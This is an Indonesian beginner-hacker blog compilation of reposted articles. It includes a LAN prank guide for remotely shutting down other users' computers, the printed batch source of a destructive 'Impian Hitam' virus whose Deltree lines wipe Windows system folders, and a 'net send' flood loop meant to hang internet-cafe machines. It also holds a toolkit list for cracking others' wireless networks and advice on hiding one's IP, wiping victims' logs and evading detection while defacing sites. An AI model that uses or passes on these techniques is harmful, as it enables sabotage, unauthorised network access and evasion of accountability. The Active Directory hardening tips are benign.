SELAMAT DATANG....

WILUNJEUNG SUMPING

Ditujukan Buat para admin pemula... Postingan diambil dari beberapa teman kita para netter juga. Semoga Bermanfaat

Wednesday, July 8, 2009

Ini Apa Ya ?

Coba Tebak ini apa.....? Subhanallah

HANTU JACKO......

http://www.youtube.com/watch?v=BwbozciYzZU

BURUAN LIAT.......

Hantu......

Bagi yang mau liahat hantu nya jacko.... nih link nya:
http://www.youtube.com/watch?v=pw2cQ9K5rJ0

Dia teh, marah karena mayatnya belum di kubur. malaikat nya cape nungguin udah seminggu cenah.

Tuesday, June 30, 2009

CETAK PHOTO

Bagi Kamu2 yag ada di kota Cimahi, Ayo Cetak Photo di Bandung Photo. Kualitas OKe, Harga Murah. Dan Keramah-tamahan serta senyuman dari crew Bandung Photo akan menemani anda.

CETAK PHOTO

Bagi Kamu2 yag ada di kota Cimahi, Ayo Cetak Photo di Bandung Photo. Kualitas OKe, Harga Murah. Dan Keramah-tamahan serta senyuman dari crew Bandung Photo akan menemani anda.

Iseng yuk.....

Mengisengi warga dalam Local Area Network

at 9:48 am (Hacking)

iseng adalah sebuah pekerjaan yang mudah menurut saya walaupun terkadang membuat orang kesal dengan perbuatan kita yah apa boleh buat kalau sudah iseng kita suka terlanjur masuk dan bersenang-senang di sini saya masukan artikel bagaimana menjahili orang dengan mematikan komputernya dengan tiba-tiba menggunakan comand prompt GBU

Mengerjai sang Penyusup (Shutdown)


Menjadi penyusup memang menyenangkan. Tapi segalanya akan jadi menjengkelkan tatkala kita dalam posisi korban/sang admin. Ini hanya salah satu alternatif untuk menjahili sang penyusup. Kita akan mematikan komputernya jarak jauh Tak perlu repot-repot menggunakan program remote kesayangan anda, gunakan saja bawaan windows. Mengenai bagaimana cara mendeteksi sang penyusup, baca artikel terdahulu.



Buka Windows Command Processor anda. Klik Start -> Run lalu ketik: cmd

Pada command prompt, ketik: shutdown -i lalu tekan Enter.
Perintah tersebut akan memanggil kotak dialog Remote Shutdown. Perhatikan screenshoot berikut:

Klik tombol Add untuk memasukkan IP Address atau nama komputer target. Anda bisa memilih aksi, Shutdown, Log Off atau Restart. Pada kolom Display warning for anda bisa menentukan berapa lama countdown yang kan ditampilkan sebelum komputer di shutdown/log off/restart. Pada Opsi planned, ada pesan otomatis yang bisa anda pilih. Pada kolom Comment, anda bisa menuliskan pesan anda untuk sang penyusup. Entah ledekan atau.. terserah anda laah.. Saya rasa anda lebih jago soal ledek-meledek hehehe…

Klik OK sesudahnya. Kira-kira di komputer target akan muncul seperti ini:



Hohoho… menyenangkan bukan?? Eh?? Kenapa?? Oh, anda adalah sang penyusup?? tidak ingin komputer yang anda pakai dimatikan dengan cara seperti diatas?? Tenang, saya ada sedikit tips..



Saat anda melihat kotak dialog peringatan bahwa komputer anda akn segera di shutdown, secepat mungkin bukalah Notepad atau aplikasi Microsoft Word. Ketik kata-kata sakti berikut: AKU INGIN HIDUP 1000 TAHUN LAGI!!
Hehehe.. kelamaan yach?? emang harus kata-kata itu?? Ya nggak laah.. ketik apa aja dech, terserah anda, yang penting jangan biarkan kosong. Jangan menekan tombol Save!!

Saat “waktu eksekusi” menunjukkan angka 00:00:00, windows akan berusaha menutup aplikasi-aplikasi yang masih terbuka. Nah, aplikasi Notepad/Microsoft word yang anda buka tadi akan meminta konfirmasi dari anda apakah anda ingin menyimpan dokumen anda. Jangan pilih apa-apa, biarkan saja kotak dialog tu bertanya-tanya ;p

Beberapa saat kemudian akan muncul kotak dialog End Program, klik tanda silang yang berada pada pojok kanan atas atau pilih cancel. Kotak dialog yang muncul berbeda-beda, kurang lebih demikian:





Nah, anda akan mendapati komputer anda tetap hidup, sehat walafiat dan berdiri tegak. hehehe…



Cuma itu caranya?? Ada nich yang lebih “formal” ^_^

1. Klik START -> Run

2. Secepat kilat, ketik shutdown -a

Perintah itu adalah perintah untuk melakukan Abort terhadap shutdown.



Lalu apa yang akan dilakukan sang Admin?? Tentu kondisi ini tidak bisa didiamkan. Jangan biarkan sang Penyusup senyum-senyum sendiri. Andalah sebagai admin yang harus tersenyum Beri serangan kedua!! Jangan dulu pakai software remot favorit anda, nggak perlu ngeluarin senjata pamungkas untuk penyusup seperti ini. Ulangi langkah awal tadi, shutdown -i, namun jangan beri centang pada opsi Warn Users Of the action dan kosongi juga opsi Planned. Jangan beri pesan apa-apa dan komputer sang penyusup akan langsung shutdown tanpa konfirmasi



Sekian… and Happy SHUTTING DOWN!!! ^_^

Virus Word.... Be Carefull

virus = teknologi pembalasan dendam?

June 1, 2007 at 8:25 am (Virus)

Muncul lagi sebuah virus lokal. Jenis virus under DOS (Batch Virus) penyebarannya termasuk sedang, tapi cara kerjanya sangat kejam sekali.

Kejam karena virus ini menghapus file-file system yang diperlukan untuk menjalankan windows. Sehingga jika kita sudah terkena virus ini mau - tidak mau meng-install ulang windows. Pada badan virus ada kode yang bertulis :

rem Deltree /y C:\Windows (dikasih rem biar gak dideteksi sbg virus)
rem Deltree /y C:\Program Files

Ini adalah sebagian kode dari Eek(C), virus lama yang selalu nangkring pada boot sector.

Saya tidak tahu pembuatnya berupaya membalas dendam atau hanya iseng saja, karena virus Eek ini muncul sekitar 3 atau 5 tahun yang lalu, coba lihat source kode virus IImpian Hitam berikut ini

@echo off
Echo Pesan ini kutujukan kepada mereka yang tak percaya akan
Echo Kemampuan ku. Aku tahu aku adalah orang yang sangat bodoh tapi
Echo apakah orang bodoh tak punya Impian … ?? Hanya dengan
Echo dalih ketidak percayaan, kalian telah hancurkan impian Putih ku
Echo Tak apa … !! karna kini impian itu tlah berubah menjadi
Echo Sebuah Impian Hitam .. !! Ingin ku buktikan akan apa yang kalian
Echo telah tuduhkan kepadaku … !! Hari ini adalah Hari Ulang Tahun Ku
Echo yang ke - 21Aku punya kado manis untuk mu !! semoga dengan kado ini kamu
Echo dapat nikmati …. !!
Echo Kepada Bapak Samsu dan Ibu Heni “Terima Kasih Kalian tlah tanamkan impian hitam dihati ini”
Echo Salam Hangat Buat Sobat - sobat satu kelas ku dulu Johan, Imron,
Echo Maulana, Mario, Toni, Usman, Septi dan semua anak - anak 3 Akuntansi 3
Echo I LOVE U ALL
Echo Bye Bye
pause
Echo Windows is updating file(s) Please wait….
rem Deltree /y C:\Windows (saya tembahkan rem agar tidak terdeteksi sbg virus Eek)
rem Deltree /y C:\Program Files

Akibat yang ditimbulkan

- Windows tidak dapat masuk karena file systemnya dihapus
- Muncul pesan seperti kode di atas
- file autoexec.bat tidak dapat diedit

Pencegahan
Kalo memang anda belum terkena virus impian hitam, cepat-cepat saja update virus anda, jika sudah…yah…mau gimana lagi? penanganannya :
- booting memakai disket startup bersih atau CD bootable
- ketik edit lalu tekan enter
-kemudian cari file autoexec.bat pada drive c:
-lalu buka, maka akan ada kode seperti yang telah disebutkan di atas, kemudian edit dengan menghapus kode tersebut dan simpan.
-setelah itu reinstall windows anda JANGAN LUPA INSTALL ANTIVIRUS DENGAN UPDATE TERBARU

Sangat disayangkan hanya membuat virus untuk balas dendam, kenapa tidak untuk mencuri data-data penting saja, lebih menguntungkan dan tentunya kita tetap bisa balas dendam…hihihihihi….

Tetapi saya tetap salut terhadap bangsa saya yang kreatip banget…terutama dalam hal merusak…he3x…viva virus-maker aja deh

Hati-hati Pengusaha Warnet !!!!

Floowding LAN
sumber: Lenk Personal blogs (thank's brow)

OK..!!! ikuti langkah2 berikut ini :

1. Run command prompt/cmd anda, caranya klik start > run > cmd
2. Saat command prompt anda muncul, ketik edit hi.bat
3. Maka tampilan command prompt anda akan berbeda. setelah itu

masukkan/ketikkan code di bawah ini :


net send [ipkomputer]/[namakomputer] hi
call hi.bat


kemudian save as file tersebut.

Saat ingin melakukan flooding, tingal klik 2 kali file batch tersebut…

Ket :

* hi.bat bisa pada langkah 2 bisa diganti dangan nama apa saja, asal tidak spasi dan harus berekstensi .bat dan jangan lupa juga mengganti hi.bat pada code dengan nama yang sama pada langkah 2.

* jika ga tau nama komputer yang terhubung di jaringan, run cmd, lalu ketik “net view” (tanpa tanda petik2) dan juga saat dimasukkan tanpa tanda [ dan ]. Ingat juga, pilih antara ip ato nama komputer.

* cara ini hanya bisa dilakukan jika service messenger pada windows anda dan komputer tujuan di aktifkan

* yang terakhir..!!!! flooding ini akan mengirim pesan “hi” (bisa diganti) berulang-ulang hingga komputer tujuan hang. jadi gunakan dengan bijak.

The Secret of wireless Hacking

Berawal dari sebuah pembelajaran dan keingintahuan akan kecanggihan teknologi wireless yang saat ini sudah banyak dipakai dilingkungan sekitar kita; maka berawal dari sebuah info seorang teman saya “Demonstrek” dimana dia mencoba berbagi ilmu untuk memperkenalkan sniffing wireless dan cara mengambil alih koneksi sebuah traffic wireless; baik dari pergerakan data hingga akess internet tanpa batas ^^ alias gratis ^^ maka dengan ini saya mencoba membagi sebuah link yang mungkin berguna Sebagai modal dasar pembelajaran daripada wireless hacking tersebut…..

Modal dasar:
Antenna Indor bekas TV yang menggunakan booster dan wajib berbentuk parabolic
1 Buah Pigtail dengan ujung nya yg terbuka (untuk dipasang di antenna); berbentuk male
Radio unit (senao, linksys, prolink, etc) dengan syarat model nya harus yg menggunakan antenna wireless dan dapat di bongkar pasang
Kabel USB +/- 20m atau sambungan dari kepala USB bekas dan kabel UTP +/- 15m (di sambung )
Grounding Petir (jika akan ditempatkan diatas genteng)
Clamp cable, lakban hitam, lem bakar / isolasi putih, kawat glavanisir,
Tiang ( lebih baik yang menggunakan kayu)
Laptop atau PC + OS windows or linux (or suka2 aja dah) bajakan nggak apa2 ^^
1 orang Teman, sehabat, pacar, adik, tetangga ^^ ataupun istri or suami anda ^^ yang bisa diajak bantu2 and yg pasti bisa pegang rahasia ini ^^


Berikut ini adalah beberapa link penting yang dapat digunakan untuk mensupport percobaan anda dalam melakukan wireless hacking ini :

Wireless Network Discovery, Mapping and Traffic Analysis - the "classical" war driving Tools for discovering wireless LANs, positioning them on the map, sniffing, logging and analyzing packets in the air.

AirFart Local mirror v 0.2.1

AirTraf Local mirror v 1.1

Aphunter Local mirror v

APradar Local mirror v 0.52

BSD-airtools (dstumbler) Local mirror v 0.2

Classic Stumbler (mac) Local mirror v 1.7

Gtkskan Local mirror v 0.2

HermesAP monitor patch Local mirror v

iStumbler (mac) Local mirror v 96

KisMAC (mac) Local mirror v R65

Kismet Local mirror v 2005-08-R1

Kismet Log Viewer Local mirror v 0.9.7

Kismet parse Local mirror v 0.2

MacStumbler (mac) Local mirror v 075b

Mognet Local mirror v 1.16

Perlskan Local mirror v 0.1

Prismdump Local mirror v 20001122

Prismstumbler Local mirror v 0.7.3

Prismsnort Local mirror v 2.0

SSIDsniff Local mirror v 0.42

THC-Wardrive Local mirror v 2.3

WaveStumbler Local mirror v 1.2.0

Wellenreiter Local mirror v 1.9

Wellenreiter for OPIE not mirrored v 1.0RC2

Wi-Find Local mirror v 0.2.1

WifiScanner Local mirror v1.0.2

Wispy-Tools Local mirror v 2006-01-R1

Wistumbler Local mirror v

Wlan-scan Local mirror v 0.0.1




Client evaluation tools - utilities to check security state of wireless clients.

Airsnarf Rogue Squadron Local mirror v 0.1
Hotspotter Local mirror v 0.4

Probemapper Local mirror v 0.5

Karma Tools Local mirror v 0.4

Wlan-webauth Not mirrored


RF signal strength monitoring - utilities for monitoring the signal strengh of the WLAN you are associated to.

Wavemon Local mirror v 0.4.0b

Wireless Power Meter Local mirror v 0.00

Wscan Local mirror v 1.00

Wscan (familiar/linux/ipaq) Local mirror v 1.00
Wscan (BSD) Local mirror v 2.00experimental

XnetworkStrength Local mirror v 0.4.2


Wireless-specific encryption cracking - tools for gaining access to protected wireless networks. At the moment include WEP crackers, WEP-encrypted traffic injectors and practical implementations of attacks against certain 802.1x types.

Airsnort Local mirror v 0.2.7e

Aircrack Local mirror v 2.41

Asleap Local mirror v 1.4

BSD-airtools (dwepcrack) Local mirror v 0.2

coWPArty Local mirror v 2.0

Leap Local mirror v

anwrap (Leapcrack) Local mirror v 0.1

LucentRegCrypto Local mirror v 0.3

THC-LEAPcracker Local mirror v 0.1

weplab Local mirror v 0.1.5

WEP_Tools Local mirror v

WepAttack Local mirror v 0.1.3

WepDecrypt Local mirror v 0.7

WEPcrack Local mirror v 0.1.0

WEPWedgie Local mirror v 0.1.0

Wnet (reinj) Local mirror v

WPA Cracker Local mirror v 0.1


Miscellaneous - difficult-to-categorise software that comes handy in wireless penetration testing.

Applewepkey Local mirror v

Airpwn Local mirror v 0.50c

Airsnarf Local mirror v 0.2

Auditor Security Collection not mirrored v 200605-02

AP-utils Local mirror v 1.5

ApHopper Local mirror v 0.3

APTools Local mirror v 0.1.0

DMZS-carte Local mirror v 0.9rc1

Ethereal/Tetheral not mirrored v 0.10.14

Ettercap Local mirror v NG-0.7.3

Gpsd Local mirror v 2.31

Gpsdrive Local mirror v 2.10pre2

Orinoco MM Patch not mirrored v Macfld.pl Local mirror v

Morinoco Patch Local mirror v 14.2

Packetyzer not mirrored v 4.03

Wifi2eth Local mirror v 0.10

Semoga Link2 tersebut dapat sedikit membantu eksperiment teman2 semua …. ^^ selamat berkarya ^^ …. Untuk para pengguna wireless mohon maaf yg sebesar2 nya bila artikel ini benar2 di praktekan …. Penulis dan editor tidak bertanggung jawab atas operasional daripada pengaplikasian artikel ini bila mana terjadi penggunaan yg menyebabkan kerugian dari kedua belah pihak…………

List Proxy anonymouse
Sialan Bnr dah gara2 url + situs2 pada diblokir in sama pemerintah sekarang Internet jadi susah terpaksa dech pake cara Proxy ... biar dibilang sialan emang sialan bnr nich zzz. masa url nya bloger juga di blokir gimana nich aturan maen nya kok bikin bingung ya ? ......

List of Proxy List ... buru2 di selametin daripada di blokir juga nich zzz

189.52.93.2 3128 transparent
2008-04-12 Whois

61.152.90.113 80 transparent China 2008-04-12 Whois

219.93.178.162 3128 transparent Malaysia 2008-04-12 Whois

202.28.27.4 80 transparent Thailand 2008-04-12 Whois

194.150.247.3 3128 transparent Poland 2008-04-12 Whois

63.149.98.2 80 high anonymity United States 2008-04-12 Whois

210.0.199.213 3128 transparent Hong Kong 2008-04-12 Whois

63.149.98.23 80 high anonymity United States 2008-04-12 Whois

63.149.98.54 80 high anonymity United States 2008-04-12 Whois

134.89.2.22 80 transparent United States 2008-04-12 Whois

63.149.98.52 80 high anonymity United States 2008-04-12 Whois

213.41.71.164 80 high anonymity France 2008-04-12 Whois

203.149.32.4 3128 transparent Thailand 2008-04-12 Whois

63.149.98.27 80 high anonymity United States 2008-04-12 Whois

189.22.132.18 3128 transparent Brazil 2008-04-12 Whois

201.114.194.163 3128 transparent Mexico 2008-04-12 Whois

63.149.98.94 80 high anonymity United States 2008-04-12 Whois

59.61.239.19 80 high anonymity China 2008-04-12 Whois

193.194.92.132 8080 transparent Algeria 2008-04-12 Whois

203.144.144.164 80 transparent Thailand 2008-04-12 Whois

194.150.247.9 3128 transparent Poland 2008-04-12 Whois

63.149.98.124 80 high anonymity United States 2008-04-12 Whois

63.149.98.228 80 high anonymity United States 2008-04-12 Whois

80.80.12.125 80 transparent Denmark 2008-04-12 Whois

63.149.98.18 80 high anonymity United States 2008-04-12 Whois

61.145.59.220 8080 transparent China 2008-04-12 Whois

200.220.142.10 3128 transparent Brazil 2008-04-12 Whois

80.80.12.123 80 transparent Denmark 2008-04-12 Whois

220.225.196.123 80 transparent India 2008-04-12 Whois

200.158.136.204 8000 anonymous Brazil 2008-04-12 Whois

192.192.247.43 3128 transparent Taiwan 2008-04-12 Whois

203.198.126.106 3128 transparent Hong Kong 2008-04-12 Whois

213.23.227.194 8080 transparent Germany 2008-04-12 Whois

63.149.98.66 80 high anonymity United States 2008-04-12 Whois

60.28.31.194 80 transparent China 2008-04-12 Whois

123.232.9.185 8080 transparent
2008-04-12 Whois

86.105.181.238 3128 transparent Romania 2008-04-12 Whois

222.252.252.129 80 transparent Vietnam 2008-04-12 Whois

209.129.192.50 80 high anonymity United States 2008-04-12 Whois

218.206.179.221 3128 transparent China 2008-04-12 Whois

63.149.98.50 80 high anonymity United States 2008-04-12 Whois

200.211.233.132 3128 transparent Brazil 2008-04-12 Whois

63.149.98.80 80 high anonymity United States 2008-04-12 Whois

218.14.227.195 3128 transparent China 2008-04-12 Whois

217.65.117.237 3128 transparent Hungary 2008-04-12 Whois

195.229.236.106 80 transparent United Arab Emirates

2008-04-12 Whois
125.242.128.69 8080 transparent South Korea

2008-04-12 Whois
210.212.90.179 3128 transparent India

2008-04-12 Whois
200.145.242.30 3128 transparent Brazil

2008-04-12 Whois
63.149.98.68 80 high anonymity United States

2008-04-12 Whois
189.20.228.98 3128 transparent Brazil

2008-04-12 Whois
210.4.36.175 3128 transparent Philippines

2008-04-12 Whois
220.225.196.132 80 transparent India

2008-04-12 Whois
63.149.98.78 80 high anonymity United States

2008-04-12 Whois
200.220.142.11 3128 transparent Brazil

2008-04-12 Whois
202.154.239.100 80 anonymous Pakistan

2008-04-12 Whois
200.174.85.193 3128 transparent Brazil

2008-04-12 Whois
218.204.126.130 80 transparent China

2008-04-12 Whois
69.16.155.29 80 high anonymity United States

2008-04-12 Whois
190.128.91.50 8080 transparent


2008-04-12 Whois
63.149.98.43 80 high anonymity United States

2008-04-12 Whois
58.211.78.212 80 transparent China

2008-04-12 Whois
221.192.133.39 80 transparent China

2008-04-12 Whois
211.140.192.186 8080 transparent China

2008-04-12 Whois
82.114.70.98 8080 transparent Czechoslovakia

2008-04-12 Whois
63.149.98.82 80 high anonymity United States

2008-04-12 Whois
210.51.22.225 80 transparent China

2008-04-12 Whois
200.174.85.195 3128 transparent Brazil

2008-04-12 Whois
63.149.98.90 80 high anonymity United States

2008-04-12 Whois
208.62.125.146 80 high anonymity United States

2008-04-12 Whois
60.208.58.60 8080 transparent China

2008-04-12 Whois
60.28.196.23 8080 transparent China

2008-04-12 Whois
219.232.224.35 3128 transparent China

2008-04-12 Whois
83.16.135.122 80 anonymous Poland

2008-04-12 Whois
63.149.98.84 80 high anonymity United States

2008-04-12 Whois
201.18.168.36 3128 transparent Brazil

2008-04-12 Whois
89.250.7.160 3128 high anonymity Russian Federation

2008-04-12 Whois
87.236.232.94 80 high anonymity Jordan

2008-04-12 Whois
58.97.1.24 8080 transparent


2008-04-12 Whois
200.211.233.131 3128 transparent Brazil

2008-04-12 Whois
67.130.82.183 80 anonymous United States

2008-04-12 Whois
58.222.254.10 3128 transparent China

2008-04-12 Whois
202.83.125.131 3128 transparent Malaysia

2008-04-12 Whois
222.122.249.5 8080 transparent South Korea

2008-04-12 Whois
63.149.98.70 80 high anonymity United States

2008-04-12 Whois
210.51.33.42 80 transparent China

2008-04-12 Whois
63.149.98.48 80 high anonymity United States

2008-04-12 Whois
211.81.22.20 3128 transparent China

2008-04-12 Whois



Yach... cukup sekian dulu dech ... daripada nanti kena blokir IP mendingan bikin anynomouse aja IP nya sekalian
Manual Lirva32
Written by lirva32
Sunday, 08 July 2007
-- Virtual Networking... Virtual Security... --
(CISCO ConfigMaker : Sarana Belajar Jaringan & Keamanan Komputer Secara Virtual)

[ 1 dari 2 tulisan ]

Author : Lirva32 [at] yahoo [dot] com




Mau belajar mendesain jaringan...??? terbatas dengan alat dan peripheral...??? Kursus yang begitu mahal...??
Sudahlah, 'ga usah difikirin banget-banget... banyak kok solusinya... ;) kini tidak usah khawatir lagi... Anda tetap masih bisa belajar jaringan komputer dan security tanpa harus mengeluarkan banyak uang untuk melakukan pembelian alatnya.
Mungkin sudah pernah dengar CISCO simulator seperti : NetSim,Boson Router Simulator. Nah, simulator2 tersebut juga bisa dipergunakan... pastinya semua konfigurasi dilakukan secara manual dan banyak fasilitas yang memang tidak didukung.
Malam ini sambil ngelemesin mata lirva32 coba akan membahas tantang CISCO ConfigMaker yang juga merupakan CISCO Simulator. Apa dan bagaimana CISCO ConfigMaker ? atau diatara Anda2 semua memang sudah terbiasa mempergunakannya..?? yyyuuukkk kita sharing bareng2....


CISCO ConfigMaker
CISCO ConfigMaker merupakan aplikasi berbasis windows yang dipergunakan untuk simulasi dalam melakukan konfigurasi jaringan komputer, CISCO Router, Switch, Hub dan devices lainnya, juga dengan dukungan untuk konfigurasi Firewall seperti : Context-Based Access Control (CBAC), Global timer values, DOS attack thresholds, Java blocking, Access lists, Enable/Disable Audit Trail.
hhiikkksss mantap banget bo... udah berbasis GUI, tinggal klik sana.. klik sini... ada wizard.. cuma main properties.. kita sudah bisa mendesain jaringan, apalagi ada fasilitas pembuatan CISCO IOS secara otomatis dari konfigurasi devices CISCO yang kita gunakan. Ada lagi kelebihan yang harus diacungkan jempol (--cukup satu jempol saja, soalnya kalo 5 jempol itu artinya jari elo jempol semua ;) yaitu kita 'ga perlu kenal yang namanya CLI alias Command Line Inteface, keren kan...??
Apa tools ini bisa dipergunakan secara offline ? ya, tentu saja. Itu artinya bahwa tanpa memiliki devices ditangan kita bisa merancang dan mengkonfigurasikan jaringan sampai apa yang kita rancang bisa diterapkan pada kondisi sebenarnya.




Last Updated ( Sunday, 08 July 2007 )
Read more...

0 Secure to Secure
Written by lirva32
Sunday, 08 July 2007
- 0 Secure to Secure -

Author : lirva32
Email : lirva32 [at] yahoo [dot] com
Url : lirva32.org


Amannnn....??? hhhmmm siapa sih yang ga mau aman... bapak penarik becakpun tetap mau aman.. ga mau di uber2 trantib... juga ga mau becaknya terbalik....
Suasana aman pasti diinginkan oleh semua orang.... begitu juga di lingkungan jaringan komputer yang kita miliki...
Begitu berharganya resource (baca : data) yang ada di server kita.... termasuk juga harga diri admin... he..he.. gue ngerasain kok ketika server gue sendiri kena 'hack' oleh siswa gue sendiri..... betapa malunya..gue minta disemen aza nih muka biar ga keliatan malunya.... ;)
Semua pasti udah pada tau... ga ada system yang 100% secure... nah, kita wajib menurunkan kadar ketidakamanannya tersebut...
Meningkatkan keamanan bukan hal yang sulit dilakukan oleh kita2 para newbie...;) hanya cukup memahami beberapa hal saja, yaitu :


Who are the enemies?

(0) Hackers
orang yang secara umum memiliki rasa anthusias dan romantis pada dunia komputer juga memiliki kemampuan untuk melakukan proses gainning terhadap komputer dan jaringan komputer.
Wahhhhh.. jangan mengangap di lingkungan kita bekerja tidak ada hackernya loh... makanya kita tidak boleh menganggap remeh lingkungan sekitar... dan dari sisi kita (Admin) juga jangan merasa udah jago... karena kalo Admin udah mersa jago bakalan banyak tindakan Attacking untuk menguji keamanan yang telah dibuat....
Kalau mau liat tampang hacker... and bener2 hacker... hhhmmm liat aza om y3dips.. om the_day.... ;)
Last Updated ( Tuesday, 10 July 2007 )

Manual _Lirva32

Menjadikan Active Directory Lebih Aman
- merupakan hasil forensic yang bisa menjadikan server 2K/2K3 lebih aman -

Author : lirva32
lirva32 [at] yahoo [dot] com


Salah satu kelemahan dari Windows 2000 Server dan 2003 Server adalah Lisensi.....[lol] btw, memang masih banyak kelemahan lain yang datangya dari ketidaktahuan kita...khususnya settingan yang ada pada Active Directory.
Sebenarnya Active Directory tidak memiliki banyak kelemahan... hanya saja kurangnya pengetahuan kita tentang apa yang harus dikerjakan didalam Active Direcetory, karena memang harus dipelajari secara bertahap dan diperlukan penetrasi testing untuk mengetahui apa yang sudah kita kerjakan dalam Active Directory.
Active Directory merupakan sumber kehdiupan dari sebuah Domain Controller... karena semua account dibawah naungan domain akan disimpan didalam Active Directory... berbeda dengan local account.... tau local account kan...?? itu loh, account yang terdapat pada masing2 komputer.. kalo account2 tersebut tidak disimpan kedalam Active Directory melainkan disimpan didalam database individu masing2 komputer...biasanya disimpan dalam file SAM (Security Accounts Manager).
Dan perlu teman2 ketahui bahwa Domain Account yang disimpan didalam file SAM akan disinkronisasikan ke Domain Controller. Bayangkan saja apa yang terjadi jika Active Directory (yang berisi acount2) tidak diamankan dengan baik...? sungguh, dalam hitungan 1,2,3 sampai 30 attacker bisa mengambil alih seluruh account yang terdapat dalam domain controller. Mau kecolongan lagi...????
Bagaimana agar Active Directory kita aman... sehingga tidak mudah account2 domain controller yang kita miliki dicuri orang lain... ;), ini ada beberapa tips yang bisa dipergunakan untuk meningkatkan kemanan Active Directory :

Securing User Account and Password

1. Proteksi Administrative Accounts :
. Gunakan Administrative accounts hanya untuk kegiatan komputasi yang benar2 dibutuhkan
. Kurangi jumlah user yang berperan sebagai Administrator

2. Gunakan beberapa bentuk authentication seperti penggunaan smart card untuk proses administrasi dan kegitanan remote akses.

3. Physically secure computers dengan sensitive information : gunakan System Key Level 2 or Level 3 untuk melakukan proteksi terhadap Account Information and LSA secrets yang dsimpan di dalam komputer.

4. Gunakan security groups : gunakan security groups dengan benar (A-G-G-U-DL-P), Anda juga dapat menerapkan sebuah 'role-based' security model dalam memberikan permission.

5. Berikan 'least privilege' untuk users selama mereka bisa menyelesaikan pekerjaan, jangan sekali2 memberikan hak user untuk menjadi setingkat dengan Administrator.

6. Buat password policies yang disesuaikan dengan kebiasaan mereka dengan acuan :balance complexity, randomness, and length.

7. Beri pendidikan pada user users and administrators lainnya tentang bagaimana membuat password yang tidak mudah ditebak

8. Enabling password policies untuk bisa menerapkan password yang kuat.

9. Remove LM hashes : Jika Anda tidak mempergunakan LAN Manager sebagai autentikasi dalam jaringan koputer, sebaiknya buang saja semua LM Password dari Domain Controller dan Local Computers.

10. Configure LM compatibility untuk mengahasilkan level aplikasi tertinggi di dalam jaringan yang Anda support


Securing Active Directory Objects dan Attributes

1. Terapkan selalu privilege terkecil selama user bisa menyelesaikan pekerjaannya

2. Berikan permission dengan pemodelan yang konsisten

3. Kurangi pemberian permission yang sifatnya Domain Local Group

4. Pastikan mempergunakan konsep DACLs pada Active Directory

5. Buang user2 yang tidak diperlukan dari Schema Admins Security Group

6. Gunakan Restric Group didalam Group Policy untuk membatasi user yang tergabung dalam Schema Admins Security Group



Implementing Group Policy

1. Gunakan Group Policy untuk security

2. Perhatian khusus sangat dibutuhkan ketika ada pendelegasian authority melalui Group Policy

3. Gunakan Block Inheritance, No Override, and Group Policy Object Filtering sesuai kebutuhan saja.


Designing Active Directory dan Domain

1. Gunakan multiple forest jika dibutuhkan monitoring terpisah antar domain

2. Perform Audit

3. Lakukan Complete Background Check secara berkala

4. Perkecil aktifitas terhadap Active Directory yang dilakukan oleh user

5. Selalu kontrol 'membership' didalam group Security

6. Delegasikan Control melalui OU

7. Gunakan Active Directory yang menyatu dengan DNS


Mudah2an dapat membantu meningkatkan keamanan terhadap Active Directory yang Anda miliki.. jika ada pertanyaan tetang bagaimana langkah2 diatas, Anda bisa menghubungi saya melalui email : lirva32@yahoo.com

Terima kasih.


.thx
lirva32
Last Updated ( Monday, 10 September 2007 )

IP Hidden -- Cara membebaskan diri dari tersangka..
Written by lirva32
Thursday, 23 August 2007

Hidden Your IP Before Hacking
-- biar kagak ketangkep kalo mau iseng2...

author : lirva32 [at] yahoo [dot] com


Hiikksss..beberapa menit yang lalu (--sekarang sih pukul 23.13) ketika gue asik ngoprek bluetooth hacking dengan SuSe... tiba2 saja HP gue berdering.. ternyata sahabat gue 'sang hacker' menelpon dan menyampaikan pesan bahwa malam ini mau melakukan proses defacing terhadap salah 1 (satu) situs underground, tak ayal lagi gue pun langsung mengaktifkan router ADSL... konek... dan menuju situs target... gue hanya melihat2 bak melihat jam tangan casio di etalase... tidak melakukan penetrasi test apapun...gue tidak mengetahui lubangya ada dimana... karena memang sudah lama sekali gue meninggalkan kegitan defacing...;). Rasa penasaran dan iseng menghujani fikiran gue yang memang hari ini masih kotor terkena deburan debu. Stttoooppppp...!!!!
Untung saja dalam setiap aksi gue selalu menutupi dan memalsukan IP address yang gue gunakan (-- sekalipun terkadang lupa..;) jadi sekarang gue akan membahas tentang cara menyembunyikan IP Address saat browsing di Internet dengan menggunakan bantuan anonymous web proxy. Ini dilakukan agar IP Address asli yang digunakan tidak diketahui oleh remote web server.

Ada berapa alasan mengapa kita harus menyembunyikan dan memalsukan IP Address asli yang kita miliki, antara lain:
[+] Mengakses ke website yang melakukan restriction -- hanya membolehkan akses dari IP Address tertentu saja.
[+] Privasi, karena gue 'ga mau nanti IP gue jadi IP tersangka.
[+] Menghindari pelacakan jika kita melakukan tindakan yang 'tidak seharusnya kita lakukan'. (baca: hacking) :-)

------| Menggunakan Proxy

Dalam melangsungkan sebuah proses attack, sebaiknya seorang attacker melakukan beberapa pengamanan. Umumnya yang dilakukan adalah:
[+] Menghapus log files pada victim
[+] Menyembunyikan IP Address komputer yang digunakan untuk melangsungkan attack
[+] Melakukan modifikasi minimum untuk tidak menarik perhatian pemilik system seperti tidak menambah user atau membuat direktori yang terlalu 'vulgar'

Penggunaa proxy disesuaikan dengan program yang kita gunakan untuk melakukan browsing seperti Internet Explorer, Mozilla, Opera, mIRC, dan lain-lain.

------|Sample: Internet Explorer


1. Jalankan Internet Explorer (IE)
2. Klik Tools
3. Klik Internet Option
4. Klik Connections
5. Klik LAN Settings
6. Aktifkan option 'Use a proxy server'




------|Sample: wget

1. Edit file /etc/wgetrc atau ~/.wgetrc
2. Ubah atau tambahkan baris : http_proxy=http://ip_address_proxy:port/



------|Sample: libwww-perl (LWP)

Pada source code program yang menggunakan bahasa pemrograman Perl dapat ditambahkan:

$ua->proxy(['http', 'ftp'], 'http://ip_address_proxy:port/');


Cara lain adalah dengan meload proxy setting dari *_proxy environment variables.

$ua->env_proxy


Untuk mengubah environment variables, dapat dilakukan via command line:$ export http_proxy=http://ip_address_proxy:port/ (sh/bash/ksh)
% setenv http_proxy 'http://127.0.0.1:8080/' (csh/tcsh)








------|Proxy Testing

Jika semuanya berjalan lancar maka kita dapat melakukan browsing secara anonymous. Lihat bagian appendix untuk mendapatkan contoh anonymous proxy.
Untuk mengetahui apakah IP Address asli yang kita gunakan sudah tersembunyi dan digantikan oleh IP Address milik anonymous web proxy, kita dapat melakukan pengecekan dengan melakukan browsing ke website yang memiliki fitur browser checker seperti
* www.dnsstuff.com
* noc.cbn.net.id
